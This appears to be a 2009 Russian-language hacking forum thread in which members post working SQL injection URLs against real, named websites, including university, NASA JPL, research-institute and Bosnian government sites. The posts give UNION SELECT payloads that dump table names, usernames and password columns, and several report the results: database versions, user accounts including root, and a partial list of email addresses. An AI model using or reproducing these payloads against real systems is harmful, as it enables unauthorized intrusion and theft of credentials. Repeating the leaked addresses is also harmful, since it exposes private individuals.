HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.06.2009, 18:39
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Код:
http://www.calvin.edu/kuyers/journal.php?ID=-26+union+select+1,2,3,4,5,group_concat(table_name+separator+0x2f),7+from+information_schema.tables+where+table_schema+not+in('information_schema')--+
version: 5.0.67
Код:
http://www.gbcnv.edu/magic/article.php?op=Print&sid=-11+union+select+uid,2,uname,pass,umode,6,7,8+from+users--+
version: 4.0.18
 
Ответить с цитированием

*.nasa.gov
  #2  
Старый 29.06.2009, 23:23
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию *.nasa.gov

jpl.nasa.gov

version: 4.0.27
user: JPLSite@localhost

Код:
http://www.jpl.nasa.gov/news/profiles.cfm?profile=-11%22+union+select+1,2,3,4,5,null,7,8,9,0,1,2,3,4,5,6,7,8,9,0,user_name,2,3,4,user_password,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+login+limit+0,1/*

Последний раз редактировалось jokester; 30.06.2009 в 00:05..
 
Ответить с цитированием

  #3  
Старый 30.06.2009, 13:33
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код HTML:
http://efmf.ru/frame.v2.shtml?song-meng.v2.php?song_id=50+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6--
4.0.27-log:efmf:efmf@v25.valuehost.ru

Код HTML:
http://michael-bg.com/products.php?sex_id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--
4.0.27-standard:michael_michael:michael@localhost
 
Ответить с цитированием

  #4  
Старый 30.06.2009, 14:52
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.bienvenueaparis.fr/flat.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,group_concat(table_name),37,38,39 ,40,41,42,43,44,45,46%20from%20information_schema. tables--

5 версия
 
Ответить с цитированием

  #5  
Старый 30.06.2009, 17:49
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.demosgreatclone.com/youtubeclone/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15--
 
Ответить с цитированием

  #6  
Старый 30.06.2009, 18:13
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 4
Код:
http://cluster2.space.swri.edu/article.php?id=-1+union+select+1,2,version(),4,5,6,7,8/*
Database Version: 5.0.45
Database name: cluster2_management
User name: IDFSproc@localhost
 
Ответить с цитированием

  #7  
Старый 30.06.2009, 19:11
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Fata1ex
Прадолжу тваё дело.
http://www.depo.ba/page.php?id=2391+union+select+1,2,3,4,5,6+/*
 
Ответить с цитированием

  #8  
Старый 30.06.2009, 19:28
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Как мило. Я почему-то решил, что уж подобрать столбцы и вывести сможет любой ) Поэтому и нераскрученные... тем более недокрученных было всего 4 из 9 = ) Ну ладно

www.iddeea.gov.ba

Код:
http://www.iddeea.gov.ba/hr_vijesti.php?id=-191+union+select+1,concat(user(),0x3a,version()),3,4/*

root@80.65.66.99:5.0.45

Вывод из mysql.user есть ;)

[TABLES]
user
user_info
users
db

user:
User
Password

user_info:
Full_name
Email

users:
email

db:
db
user


Users.Email:
zagorkresevo@hotmail.com
strateski.razvoj@etikete-agens
nevzad_r@hotmail.com
...
Ctacok, жжошь Сам бы ни за что не догадался (:

Последний раз редактировалось Fata1ex; 30.06.2009 в 19:37..
 
Ответить с цитированием

  #9  
Старый 30.06.2009, 19:53
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://ocenshik.mostpp.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,%20user(),%2 0database(),%20version()),6,7,8+/*
root@zvm27.host.ru: ocenshik:4.0.27
 
Ответить с цитированием

  #10  
Старый 30.06.2009, 20:31
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME%20+FRO M+INFORMATION_SCHEMA.TABLES)--

Плохо в MSSQL скулях так что не судите
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ